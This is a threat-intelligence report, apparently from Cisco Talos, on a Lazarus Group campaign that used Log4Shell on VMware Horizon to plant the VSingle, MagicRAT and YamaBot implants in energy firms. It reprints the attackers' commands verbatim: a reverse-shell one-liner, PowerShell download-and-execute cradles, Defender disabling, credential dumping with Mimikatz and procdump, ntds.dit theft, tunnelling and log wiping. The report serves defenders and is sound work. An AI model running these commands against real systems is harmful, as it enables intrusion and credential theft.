The North Korean Lazarus Group Hacked Energy Providers Worldwide

The North Korean Lazarus Group Hacked Energy Providers Worldwide

INTRODUCTION

Cisco Talos observed North Korean state-sponsored APT Lazarus Group conducting malicious activity between February and July 2022. Lazarus has been previously attributed to the North Korean government by the U.S. Cybersecurity and Infrastructure Security Agency (CISA). The entry vectors involve the successful exploitation of vulnerabilities in VMWare products to establish initial footholds into enterprise networks, followed by the deployment of the group’s custom malware implants, VSingle and YamaBot. In addition to these known malware families, we have also discovered the use of a previously unknown malware implant we’re calling “MagicRAT.”

This campaign was previously partially disclosed by other security firms, but our findings reveal more details about the adversary’s modus operandi. We have also observed an overlap of command and control (C2) and payload-hosting infrastructure between our findings and the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) June advisory that detailed continued attempts from threat actors to compromise vulnerable VMWare Horizon servers.

In this research, we illustrate Lazarus Group’s post-exploitation tactics, techniques and procedures (TTPs) to establish a foothold, perform initial reconnaissance, deploy bespoke malware and move laterally across infected enterprises. We also provide details about the activities performed by the attackers when the VSingle backdoor is instrumented on the infected endpoints.

In this campaign, Lazarus was primarily targeting energy companies in Canada, the U.S. and Japan. The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives. This activity aligns with historical Lazarus intrusions targeting critical infrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.

Attribution

Cisco Talos assesses with high confidence these attacks have been conducted by the North Korean state-sponsored threat actor Lazarus Group. During our investigations, we identified three distinct RATs being employed by the threat actors, including VSingle and YamaBot, which are exclusively developed and distributed by Lazarus. The Japanese CERT (JPCERT/CC) recently published reports (VSingleYamaBot), describing them in detail and attributed the campaigns to the Lazarus threat actor.

The TTPs used in these attacks also point to the Lazarus threat actor. The initial vector was the exploitation of the Log4j vulnerability on exposed VMware Horizon servers. Successful post-exploitation led to the download of their toolkit from web servers. The same initial vector, URL patterns and similar subsequent hands-on-keyboard activity have been described in this report from AhnLab from earlier this year. There are also overlapping IOCs between the campaign described by AhnLab and the current campaign, such as the IP address 84[.]38.133[.]145, which was used as a hosting platform for the actors’ malicious tools. Although the same tactics have been applied in both attacks, the resulting malware implants deployed have been distinct from one another, indicating the wide variety of implants available at the disposal of Lazarus. Additionally, we’ve also observed similarities in TTPs disclosed by Kaspersky attributed to the Andariel sub-group under the Lazarus umbrella, with the critical difference being the deployment of distinct malware. While Kaspersky discovered the use of Dtrack and Maui, we’ve observed the use of VSingle, YamaBot and MagicRAT.

Cisco Talos acknowledges that when analyzed individually, the attribution evidence only reaches medium-confidence, however, we’re raising our confidence level when analyzing all these points in the context of the campaign and victims.

CAMPAIGN

Cisco Talos has observed several attacks targeting multiple victims. In this section, we detail two specific attack instances that we assess have been the most representative of the playbooks employed by Lazarus in this campaign:

  • Victim 1: Illustrates the kill chain from exploitation to actions on objectives. This intrusion also illustrates the use of the VSingle implant.
  • Victim 2: Represents a kill chain similar to Victim 1 but in this instance, we observed the deployment of a new implant we’re calling “MagicRAT” along with VSingle.

A third intrusion set worth noting here is one where we saw the use of a third bespoke implant known as YamaBot. YamaBot was recently disclosed and attributed to the Lazarus APT by the Japan Computer Emergency Response Team Coordination Center (JPCERT/CC).

Victim No. 1: VSingle and beyond

In the case of the first victim, we observed the exploitation of publicly known vulnerabilities to ultimately deploy the VSingle backdoor on infected endpoints to establish long-term access.

In this specific instance, we also observed the actual instrumentation of VSingle implants to carry out additional malicious activities on the infected systems. The flow below provides an overview of the attacker’s playbook, which will be detailed in the sections ahead.

EXPLOITATION AND FOOTHOLD

Cisco Talos identified the exploitation of the Log4Shell vulnerability on VmWare Horizon public-facing servers as the initial attack vector [T1190]. The compromise is followed by a series of activities to establish a foothold [TA0001] on the systems before the attackers deploy additional malware and move laterally across the network. During our investigation, we discovered two different foothold payloads. In the first, the attackers abuse node.exe, which is shipped with VMware to execute the oneliner node.exe script below.

 C:"Program Files"\VMware"VMware View"\Server\appblastgateway\node.exe -r net -e "sh = require('child_process').exec('cmd.exe');var client = new net.Socket();client.connect(<Port>, '<C2_IP>', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"
 

This essentially opens an interactive reverse shell that attackers could use to issue arbitrary commands on the infected entry endpoint.

In another instance, we observed the attackers exploiting vulnerabilities in VMWare to launch custom PowerShell scripts on the infected endpoint via VMWare’s ws_ConnectionServer.exe:

powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://<remote_location>/<filename>.ps1')

Since VMWare Horizon is executed with administrator privileges, the attacker doesn’t have to worry about elevating their privileges.

After the interactive shell is established, the attackers perform a preliminary reconnaissance on the endpoint to get network information and directory listings [T1083], [T1590], [T1518]:

ipconfig /all
dir c:”Program Files (x86)
dir c:”Program Files

The next step is the deactivation of the Windows Defender components [T1562]. This is done through registry key changes, WMIC commands and PowerShell commands. The list below contains the full list of methods Cisco Talos observed.

powershell -exec bypass -Command Get-MpPreference
powershell.exe -ExecutionPolicy Bypass -command Set-MpPreference -DisableRealtimeMonitoring $true
reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection /s /f DisableRealtimeMonitoring

Once the AV on the system has been bypassed using the reverse shell, the attackers then deploy the actual malware implant from a malware family known to be developed and operated by Lazarus called “VSingle.”

The deployment consists of downloading a copy of the legitimate WinRAR utility from a remote location controlled by the attackers along with an additional payload (archive) [T1608]:

powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile(‘<remote_location>\\rar.tmp’, ‘<local_path>\\rar.exe’)
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile(‘<remote_location>\\update.tmp <local_path>\\java.tmp’)
<local_path>\\rar.exe e <local_path>\\java.tmp <local_path_2> -hp!no!

The archive downloaded to the infected endpoint is decompressed and consists of the VSingle malware executable which is optionally renamed and then persisted on the endpoint by creating an auto-start service.

HOW IS VSINGLE USED?

Our investigations led to the discovery of commands fed to the VSingle backdoor by the attackers to carry out a variety of activities such as reconnaissance, exfiltration and manual backdooring.

The actor starts by performing additional reconnaissance tasks by running the commands below [T1083], [T1590].

COMMANDINTENT
systeminfo & ipconfig /all & netstat -naop tcp & tasklist & net user & net view & arp -aSystem Information Discovery [T1082]
query userSystem Information Discovery [T1082]
whoamiSystem Information Discovery [T1082]
dir /a %appdata%\microsoftSystem Information Discovery [T1082]
dir /a C:\Windows\system32\config\systemprofile\AppData\Roaming\microsoft
cmd.exe /u /c dir /a c:\users\administrator
System Information Discovery [T1082]
cmd /C pwd
cmd /C dir
cmd /C cd c:\\Users\\<username>\Download & dir
cmd /C cd c:\\Users\\<username>\Downloads & dir
cmd /C cd c:\\Users\\<username> & dir
cmd /C cd c: & dir
cmd /C tree c:\\Users
System Information Discovery [T1082]
cmd.exe /u /c time /t
cmd.exe /u /c query session
System Information Discovery [T1082]

These commands will give the operators a solid understanding of the system they are in, including the installed software, network configuration and system users, among other things. This kind of information is crucial to preparing for lateral movement activities.

The attackers also force the system to cache credentials so that it is possible to harvest them afterward [T1003/005].

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f

The other configuration changes made to the victim host are intended to provide the attackers with their own admin-level users [T1136].

COMMANDINTENT
cmd.exe /u /c net user <userid> <password> /addCreate user
cmd.exe /u /c reg add HKLM\software\microsoft\windows nt\currentversion\winlogon\specialaccounts\userlist /v <username> /t REG_DWORD /d 0 /fAdd privileges
cmd.exe /u /c net localgroup Administrators /add <username>
cmd.exe /u /c net localgroup Remote Desktop Users /add <username>
Add privileges
cmd.exe /u /c net localgroup Administrateur /add <username>
cmd.exe /u /c net localgroup Administrateurs /add <username>
Add privileges
cmd.exe /u /c reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon /v AllowMultipleTSSessions /t REG_DWORD /d 1 /fSystem config – Allow multiple sessions
cmd.exe /u /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /fSystem config – disable UAC
cmd.exe /u /c reg add HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa /v LmCompatibilityLevel /t REG_DWORD /d 0 /fSystem config – LAN Man compatibility

These could be used if the RAT is detected/removed or even provide the actors with an RDP access, avoiding the use of a malicious tool.

With VSingle in place, the attackers can access other systems with the help of two additional tools.

  • pvhost.tmp renamed to pvhost.exe, which is actually plink.exe, a utility from Putty that can create SSH tunnels between systems.
  • osc.tmp renamed to osc.exe, which we assess with high confidence is 3proxy. Unfortunately, Cisco Talos could not obtain a copy of the file.

These two tools working together create a proxy on the victim system which has its listening port “exported” to a port on a remote host. This mechanism allows the attacker to have a local proxy port that gives access to the victim network as if the attacker’s box was on it directly.

First, the attackers start the osc.exe (3proxy) to listen on a loopback port (in this example, we chose 8118), with the command below.

C:\Windows\system32\config\systemprofile\AppData\Roaming\microsoft\osc.exe -i127.0.0.1 -p8118

This alone wouldn’t help the attackers, they actually need to have port 8118, exposed on their own network that they can connect to. So, they created an SSH tunnel using Plink, but they forwarded a local port to a remote address, in this case, a remote server controlled by the attackers:

C:\Windows\system32\config\systemprofile\AppData\Roaming\microsoft\pvhost.exe -N -R 18118:127.0.0.1:8118 -P [Port] -l [username] -pw [password] <Remote_IP>

The option -R forwards the port 8118 on 127.0.0.1 to the remote server on port 18118.

VSINGLE RAT ANALYSIS

The VSingle loader executable is an MFC-based backdoor that consists of multiple layers. The first is responsible for decoding and executing the next layer (layer 2), a shellcode in the memory of the implant process. The shellcode is simply an injector for the next layer (layer 3, also shellcode). The implant spawns a new “explorer.exe” process and injects shellcode (layer 3) into it for execution.

The layer 3 shellcode is injected into a newly spawned benign process, such as explorer.exe, which consists of decoding another layer (layer 4) of shellcode that is then executed in the benign process.

Layer 4 is the actual VSingle implant DLL loaded reflectively into the memory of the benign process.

The implant is simple in terms of functionalities and is basically a stager that enables the attackers to deploy more malware on the infected system. It also includes the ability to open a reverse shell that connects to the C2 server and allows untethered access to the attackers to the endpoint to execute commands via “cmd.exe.”

Although a rather simple RAT, VSingle can download and execute additional plugins from the C2 server. These plugins can either be in the form of shellcode or script files of specific formats served by the C2. The image below shows the code used to execute a shellcode downloaded.

In-memory shellcode execution by the implant.
For simpler cases, the implant can receive executables or scripts, save them into a file in the %temp% directory and execute them on the endpoint. The implant supports the .vbs, .bat and .tmp files, since all of them are executed through “cmd /c.” The .tmp files can also be loaded as executables (.exe).

The implant can achieve persistence for malware artifacts served and specified by the C2 server. The simpler mechanism is the creation of a file in the Startup folders, which is done in two different locations:

c:\Documents and Settings\%s\Start Menu\Programs\Startup\%s
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\

Additionally, there are three other ways available, all of which use the “cmd.exe /c” command, that the VSingle operators can use:

COMMANDINTENT
sc create “%s” DisplayName= “%s” type= own type= interact start= auto error= ignore binpath= “cmd.exe /k start \”\” \”%s\”Auto start Service Creation [T1543/003]
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v “%s” /t REG_SZ /d “%s” /fRun registry key [T1547/001]
schTasks /Create /F /TN “%s” /TR “%s” /SC onlogonScheduled task triggered at logon [T1053/005]
schtasks /create /tn <task_name> /tr C:\\Windows\\upsvc.exe /sc onstart /ru System /rl highest /fScheduled task triggered at system start with high priority [T1053/005]

Victim No. 2: The discovery of MagicRAT

In another victim’s network, we saw a similar chain of events: initial recon followed by disabling the AV software and the deployment of a bespoke implant. We also observed successful lateral movement into other endpoints in the enterprise.

What’s unique in this intrusion, however, is that we observed the deployment of a fairly new implant three days before the attackers deployed VSingle on the infected systems.

This implant called “MagicRAT” is outlined in a recently published post. The reverse interactive shell eventually downloads MagicRAT from a remote location.

MAGICRAT ANALYSIS

In this campaign, MagicRAT was configured with a different configuration file and path. It also reported to different C2 servers. The configuration directory is now called “MagicMon” in the current user’s “AppData\Roaming” directory. As seen in the screenshot below, this folder creates and hosts an initialization file named “MagicSystem.ini.” This INI file contains several configurations including the list of C2 URLs that can be used by the implant to send and receive commands and data.

INI file containing the list of base64 encoded C2 URLs.

LATERAL MOVEMENT

During the first few days after the successful initial access, the attackers conducted limited reconnaissance of the endpoint and deployed two different malware families MagicRAT and VSingle on the infected endpoint to maintain covert access to the system. Just like with the first victim, the attackers then started to perform Active Directory (AD) related explorations (via impacket and VSingle) to identify potential endpoints to laterally move into. The table below illustrates the commands executed to perform such actions.

COMMANDINTENT
powershell.exe Get-NetUser 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1User Discovery [T1033]
powershell.exe Get-ADDomain 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1Account/Domain Discovery [T1087]
powershell.exe Get-ADUser <server> -Properties * 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1User Discovery [T1033]
powershell.exe Get-ADUser -Filter * 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1User Discovery [T1033]
powershell.exe Get-ADGroup -filter * 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1Account/Domain Discovery [T1087]
powershell.exe Get-AdComputer -filter * 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1System Information Discovery [T1082]
powershell.exe Get-ADComputer -filter {OperatingSystem -Like ‘*Windows 10*’} -property * | select name, operatingsystemSystem Information Discovery [T1082]
nslookup <remote_computername>Account/Domain Discovery [T1087]
powershell.exe Get-WMIObject -Class win32_operatingsystem -Computername <remote_computername>System Information Discovery [T1082]
powershell.exe Get-ADUser -Filter * | Select SamAccountNameUser Discovery [T1033]
powershell.exe Get-AdUser -Filter * -Properties * | Select Name, logonCountUser Discovery [T1033]
powershell.exe Get-AdComputer -Filter * -Properties * | select Name, LastLogonDate, lastLogon, IPv4AddressAccount/Domain Discovery [T1087]

Once the list of computers and users is obtained, the attackers would manually ping specific endpoints in the list to verify if they are reachable (with an occasional tracert). VSingle deployment on new hosts was done by using WMIC to start a remote process. This process was, in fact, a PowerShell snippet that would download VSingle from a remote system [T1608/001].

WMIC /node:<Computer_Name> process call create "powershell.exe (New-Object System.Net.Webclient).DownloadFile('<remote_location>/svhostw.exe','<local_path>\\svhostww.exe')"

In some infections, we observed the deployment of impacket tools on other endpoints to move laterally and establish an interactive shell.

This stage of the attacks was clearly manual work performed by a human operator. While trying to establish interactive remote console sessions, we can see the operators making errors on the commands.

TRY #COMMANDRESULT
1Enter-PSSession <ComputerName>Failed attempt
2Enter-PSSessionFailed attempt
3powershell.exe Enter-PSSessionCorrect command

The attackers typically take their time to explore the infected system by obtaining file listings of multiple directories of interest to them. When files of particular interest are found they are put into a .rar archive for exfiltration, typically via one of the custom-developed implants running on the system.

Victim No. 3: VSingle makes way for YamaBot

During one particular intrusion, the attackers first deployed VSingle on the endpoint. However, after the VSingle sample was detected, the attackers were at risk of losing access to the enterprise. Therefore, after repeated failed attempts to deploy VSingle on the endpoints, the attackers then deployed another updated copy of VSingle. After maintaining continued access for a while, the attackers then moved on to the use of another implant — YamaBot.

YamaBot is a custom-made GoLang-based malware family. It uses HTTP to communicate with its C2 servers. It typically begins by sending preliminary system information about the infected endpoint to the C2: computer name, username and MAC address.

YamaBot’s helper function names.
This implant has standard RAT capabilities, including the ability to:

  • List files and directories.
  • Send process information to C2.
  • Download files from remote locations.
  • Execute arbitrary commands on the endpoints.
  • Uninstall itself.

YamaBot was recently attributed to the Lazarus APT group by JPCERT who provided an excellent analysis of the implant.

Credential Harvesting

Apart from the usual recon and deployment of the custom implants, we also observed Lazarus’ use of completely different TTPs for credential harvesting. The attackers created backups of volumes that were then used to create a copy of the “ntds.dit” file for exfiltration containing Active Directory data.

COMMANDINTENT
vssadmin list shadows /for=C: ^> <local_path>\<log_file> > <local_path>\execute.bat & C:\Windows\system32\cmd.exe /Q /c <local_path>\execute.bat & del <local_path>\execute.batSystem Information Discovery [T1082]
vssadmin create shadow /For=C: ^> <local_path>\<log_file> > <local_path>\execute.bat & C:\Windows\system32\cmd.exe /Q /c <local_path>\execute.bat & del <local_path>\execute.batOS Credential Dumping: NTDS [T1003/003]
cmd.exe /C copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit <local_path>\phPzFvOU.tmp ^> <local_path>\<log_file> > <local_path>\execute.bat & C:\Windows\system32\cmd.exe /Q /c <local_path>\execute.bat & del <local_path>\execute.batOS Credential Dumping: NTDS [T1003/003]

THE VARIATIONS IN THE PLAYBOOK

The overall structure of the infection chains remained the same across multiple intrusions in this campaign, primarily consisting of the cyber kill chain that we illustrated at the beginning of the campaign section.

However, there were some key variations that consist of some optional activities conducted by the adversary in different intrusion sets. These variations include the use of:

  • Credential harvesting using tools such as Mimikatz and Procdump.
  • Proxy tools to set up SOCKs proxies.
  • Reverse tunneling tools such as PuTTY’s plink.

It is therefore necessary to list all the TTPs used by the adversary across all the intrusions we’ve discovered in this campaign. This section provides an additional list of TTPs and commands used by the operators along with their corresponding MITRE ATT&CK IDs to help defenders better understand this APT’s offensive playbook.

Note: There is some overlap between operations (common or similar commands) carried out via the reverse shell, the VSingle RAT and impacket tools. This could be because there might be multiple human operators manually executing their own set of commands based on their shift days and timings (without proper handover of information collected and percolated from one operator to another).

For example, in one instance, the attackers tried to obtain Active Directory information on one endpoint via PowerShell cmdlets. However, a day later, the attackers used adfind.exe to extract similar information on the same endpoint.

Disabling AV components

The threat actors used multiple variations of commands to query information about the installed antivirus software on the endpoints, followed by disabling the Windows Defender antivirus.

COMMANDINTENT
cmd /C wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displaynameSecurity Software Discovery [T1518/001]
wmic /namespace:\\root\SecurityCenter2 path AntiVirusProduct get /format:listSecurity Software Discovery [T1518/001]
cmd.exe /Q /c wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName, productState, pathToSignedProductExe 1> \\127.0.0.1\ADMIN$\<log_file_name> 2>&1Security Software Discovery [T1518/001]
cmd.exe /c powershell -exec bypass -Command Get-MpPreferenceSecurity Software Discovery [T1518/001]
powershell.exe -ExecutionPolicy Bypass -command Set-MpPreference -DisableRealtimeMonitoring $trueImpair Defenses [T1562/001]
reg query HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection /s /f DisableRealtimeMonitoringImpair Defenses [T1562/001]
powershell -exec bypass -Command Set-MpPreference -SubmitSamplesConsent NeverSendpowershell -exec bypass -Command Set-MpPreference -MAPSReporting DisableImpair Defenses [T1562/001]
cmd.exe /c reg add HKLM\SOFTWARE\Policies\Microsoft\Windows Defender /v DisableAntiSpyWare /t REG_DWORD /d 1Impair Defenses [T1562/001]

Reconnaissance

During the reconnaissance and credential harvesting stage, the attackers gather information about the system, the network — including the domain — and the installed software. Using a WMIC command, the attackers also collect information about the logical drives of the infected systems.

Then, the attackers harvest and exfiltrate credentials. During the reconnaissance stage, the attackers specifically check if the RDP port is open. If it is and the attackers decrypt any of the harvested credentials, they would have direct access to the system without the need to install any other backdoor. The complete list of commands is provided in the table below.

COMMANDINTENT
cmd.exe /c ipconfig /allNetwork discovery [T1590]
cmd.exe /c dir c:”Program Files (x86)Installed software [T1518]
cmd.exe /c dir c:”Program FilesInstalled software [T1518]
cmd.exe /c systeminfoSystem Information Discovery [T1082]
cmd /C qwinstaUser Discovery [T1033]
cmd /C nslookupNetwork discovery [T1590]
cmd /C netstat -noa | findstr 3389Network discovery [T1590]
cmd /C net view /domainDomain discovery [T1087/002]
cmd /C wmic logicaldisk get deviceid, sizeSystem Information Discovery [T1082]
cmd.exe /c reg query HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-TcpSystem Information Discovery [T1082]
cmd.exe /Q /c wevtutil qe Microsoft-Windows-TerminalServices-LocalSessionManager/Operational /c:20 /q:*[System [(EventID=25)]] /rd:true /f:text 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1Query event logs – Get RDP session reconnection information
netsh advfirewall firewall add rule name=allow RemoteDesktop dir=in protocol=TCP localport=3389 action=allowModify Firewall [T1562/004]
reg.exe add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 3389 /fConfigure RDP [T1021/001]

Credential harvesting

In some intrusions, the attackers saved copies of registry hives for subsequent exfiltration for obtaining credentials and policy information.

COMMANDINTENT
cmd.exe /c reg save hklm\sam <local_path>\zsam.tmpCredential harvesting [T1003]
cmd.exe /c reg save hklm\security <local_path>\zsec.tmpCredential harvesting [T1003]
cmd.exe /c reg save hklm\system <local_path>\zsys.tmpCredential harvesting [T1003]
<local_path>\rar.exe a <local_path>\zzzzz.tmp <local_path>\zs*.tmpArchive Collected Data [T1560]
cmd.exe /c copy /y <local_path>\zzzzz.tmp c:”Program Files\”VMware View\server\broker\webapps\portal\webclient\z.tmpArchive Collected Data [T1560]

Active Directory (AD) Recon

The attackers also typically use a malicious batch (.bat) file called “adfind.bat” to execute adfind.exe on some of the infected endpoints to get AD information from the endpoints.

COMMANDINTENT
cmd.exe /c <local_path>\adfind.batRemote System Discovery [T1018]
adfind.exe -f (objectcategory=person)Remote System Discovery [T1018]
adfind.exe -f objectcategory=computerRemote System Discovery [T1018]
adfind.exe -f (objectcategory=organizationalUnit)Remote System Discovery [T1018]
adfind.exe -f (objectcategory=group)Remote System Discovery [T1018]
adfind.exe -gcb -sc trustdmpDomain Trust Discovery [T1482]

We also observed the use of dsquery to obtain similar information.

COMMANDINTENT
cmd.exe /Q /c echo dsquery computer ^> \\127.0.0.1\C$\<impacket_log_file> 2^>^&1Domain Account Discovery [T1087/002]
cmd.exe /Q /c echo dsquery group -name GroupName ^> \\127.0.0.1\C$\<impacket_log_file> 2^>^&1Domain Account Discovery [T1087/002]
cmd.exe /Q /c echo dsquery computer -name ComputerName ^> \\127.0.0.1\C$\<impacket_log_file> 2^>^&1Domain Account Discovery [T1087/002]
cmd.exe /Q /c echo dsquery user -name UserName ^> \\127.0.0.1\C$\<impacket_log_file>t 2^>^&1Domain Account Discovery [T1087/002]

Unauthorized account creations

In most instances, the attackers instrumented the reverse shell to create their own user accounts on the endpoints they had initial access to. Similar activity was also seen being conducted via the VSingle implant as it was propagated across an enterprise.

COMMANDINTENT
net1 group /domainDomain discovery [T1087/002]
net1 user <username> <password> /domainCreate Account [T1136/002]
net1 user <username> /active:yes /domainCreate Account [T1136/002]
net1 group <groupname> /add /domainCreate Account [T1136/002]
net1 group <groupname> <username> /add /domainCreate Account [T1136/002]

Additional tools used

In some cases, the attackers deployed commonly used tools often seen from other threat actors.

MIMIKATZ

The attackers downloaded the Mimikatz tool from their server, inside a .rar archive protected with a password, which prevents any kind of detection by network intrusion prevention systems.

COMMANDINTENT
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile(‘http://<remote_location>/mi.tmp’, ‘<local_path>\m.tmp’)Download Payloads [T1608/001]
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile(‘http://<remote_location>/mi64.tmp’, ‘<local_path>\mi.tmp’)Download Payloads [T1608/001]
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile(‘http://<remote_location>/mm.rar’, ‘<local_path>\mm.tmp’)Download Payloads [T1608/001]
<local_path>\rar.exe e <local_path>\m.tmp <local_path>\ -p<password>Extract files [T1140]
<local_path>\mi.exe privilege::debug sekurlsa::logonPasswords exitOS Credential Dumping [T1003/001]

PROCDUMP

Along with Mimikatz, the attackers also used procdump to dump the LSASS memory to a file on disk.

COMMANDINTENT
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile(‘http://<remote_location>/pd64.tmp’, ‘<local_path>\pd.tmp’)Download Payloads [T1608/001]
ren <local_path>\pd.tmp pd64.exeRename files
<local_path>\pd64.exe -accepteula -ma lsass <local_path>\z_pd.dmpOS Credential Dumping [T1003/001]

SOCKS PROXY

In another instance, the attackers downloaded and set up a SOCKS proxy on the local endpoint, including the use of 3proxy.

COMMANDINTENT
powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile(‘http://<remote_location>/spr.tmp’, ‘<local_path>\spr.tmp’)Download Payloads [T1608/001]
<local_path>\rar.exe e <local_path>\spr.tmp <local_path_2> -p<password>Extract files [T1140]
<local_path_2>\msconf.exe -i 84[.]38[.]133[.]145 -p <Port_number>Proxy [T1090]

Implant deployment and lateral movement

Across the first endpoints compromised in the enterprises, we observed the attackers downloading their custom implants from remote locations and deploying and persisting them on the systems.

COMMANDINTENT
WMIC /node:<Computer_Name> process call create “powershell.exe (New-Object System.Net.Webclient).DownloadFile(‘<remote_location>/svhostw.exe’,'<local_path>\\svhostww.exe’)”Download Payloads [T1608/001]
sc create <service_name> type= own type= interact start= auto error= ignore binpath= cmd /K start <local_path_2>\\svhostww.exePersistence [T1543/003]

On the endpoints that were breached by performing lateral movement from an already compromised host, the implants were deployed either from a remote external location or the source host itself by opening up interactive shells and the use of implacket tools:

COMMANDINTENT
powershell.exe Enter-PSSessionRemote Access [T1219]
powershell.exe Invoke-Command -ComputerName <ComputerName> -ScriptBlock {cmd.exe /c dir}Remote Access [T1219]
python wmiexec.py <userid>:<password>@<local_IP_of_another_endpoint> 1> \\127.0.0.1\ADMIN$\<impacket_log_file> 2>&1Remote Access [T1219]

Cleanup

Once the backdoors and implants were persisted and activated on the endpoint, the reverse shell used to perform cleanup [T1070], this included deleting all files in the infection folder along with the termination of the powershell tasks. The attacker-created accounts were removed and, finally, the Windows Event logs [T1070/001] would be purged with the command below.

for /F tokens=* %1 in ('wevtutil.exe el') DO wevtutil.exe cl %1 1> \\127.0.0.1\ADMIN$\<log_file_name> 2>&1

Manual operations

In multiple instances, the attackers mistyped commands on the infected endpoint via the reverse shell, indicating that the commands were being served by an operator manually operating the infections:

ip config /all
net suer
netstat -noa | finstr 3389
powrshell.exe Get-AdUser -Filter * -Properties * | Select Name, logonCount
powrshell.exe Get-AdComputer -Filter * -Properties * | select Name, LastLogonDate, lastLogon, IPv4Address

IOCS

THE IOC LIST IS ALSO AVAILABLE IN TALOS’ GITHUB REPO HERE.

VSingle

586F30907C3849C363145BFDCDABE3E2E4688CBD5688FF968E984B201B474730

MagicRAT

8ce219552e235dcaf1c694be122d6339ed4ff8df70bf358cd165e6eb487ccfc5
c2904dc8bbb569536c742fca0c51a766e836d0da8fac1c1abd99744e9b50164f
dda53eee2c5cb0abdbf5242f5e82f4de83898b6a9dd8aa935c2be29bafc9a469
90fb0cd574155fd8667d20f97ac464eca67bdb6a8ee64184159362d45d79b6a4

YamaBot

f226086b5959eb96bd30dec0ffcbf0f09186cd11721507f416f1c39901addafb

Procdump

16F413862EFDA3ABA631D8A7AE2BFFF6D84ACD9F454A7ADAA518C7A8A6F375A5
05732E84DE58A3CC142535431B3AA04EFBE034CC96E837F93C360A6387D8FAAD

Mimikatz

6FBB771CD168B5D076525805D010AE0CD73B39AB1F4E6693148FE18B8F73090B
912018AB3C6B16B39EE84F17745FF0C80A33CEE241013EC35D0281E40C0658D9
CAF6739D50366E18C855E2206A86F64DA90EC1CDF3E309AEB18AC22C6E28DC65

3Proxy

2963a90eb9e499258a67d8231a3124021b42e6c70dacd3aab36746e51e3ce37e

PuTTY plink

2AA1BBBE47F04627A8EA4E8718AD21F0D50ADF6A32BA4E6133EE46CE2CD13780
5A73FDD0C4D0DEEA80FA13121503B477597761D82CF2CFB0E9D8DF469357E3F8

Adfind

C92C158D7C37FEA795114FA6491FE5F145AD2F8C08776B18AE79DB811E8E36A3

IPs

104[.]155[.]149[.]103
40[.]121[.]90[.]194
185[.]29[.]8[.]162
146[.]4[.]21[.]94
46[.]183[.]221[.]109
84[.]38[.]133[.]145
109[.]248[.]150[.]13
155[.]94[.]210[.]11
192[.]186[.]183[.]133
54[.]68[.]42[.]4
84[.]38[.]133[.]145
213[.]180[.]180[.]154

URLS

hxxp[://]104[.]155[.]149[.]103/2-443[.]ps1
hxxp[://]104[.]155[.]149[.]103/8080[.]ps1
hxxp[://]104[.]155[.]149[.]103/mi64[.]tmp
hxxp[://]104[.]155[.]149[.]103/mi[.]tmp
hxxp[://]104[.]155[.]149[.]103/mm[.]rar
hxxp[://]104[.]155[.]149[.]103/pd64[.]tmp
hxxp[://]104[.]155[.]149[.]103/rar[.]tmp
hxxp[://]104[.]155[.]149[.]103/spr[.]tmp
hxxp[://]104[.]155[.]149[.]103/t[.]tmp
hxxp[://]104[.]155[.]149[.]103/update[.]tmp
hxxp[://]109[.]248[.]150[.]13:8080/1
hxxp[://]146[.]4[.]21[.]94/tmp/data_preview/virtual[.]php
hxxp[://]185[.]29[.]8[.]162:443/1[.]tmp
hxxp[://]40[.]121[.]90[.]194/11[.]jpg
hxxp[://]40[.]121[.]90[.]194/300dr[.]cert
hxxp[://]40[.]121[.]90[.]194/b[.]cert
hxxp[://]40[.]121[.]90[.]194/qq[.]cert
hxxp[://]40[.]121[.]90[.]194/ra[.]cert
hxxp[://]40[.]121[.]90[.]194/Rar[.]jpg
hxxp[://]40[.]121[.]90[.]194/tt[.]rar
hxxp[://]46[.]183[.]221[.]109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/huntertroy[.]exe
hxxp[://]46[.]183[.]221[.]109//dfdfdfdfdfdfdfdfdfaflakjdfljaldjfladfljaldkfjlajdsflajdskf/svhostw[.]exe
hxxp[://]84[.]38[.]133[.]145/board[.]html
hxxp[://]84[.]38[.]133[.]145/header[.]xml
hxxp[://]www[.]ajoa[.]org/home/manager/template/calendar[.]php
hxxp[://]www[.]ajoa[.]org/home/rar[.]tmp
hxxp[://]www[.]ajoa[.]org/home/tmp[.]ps1
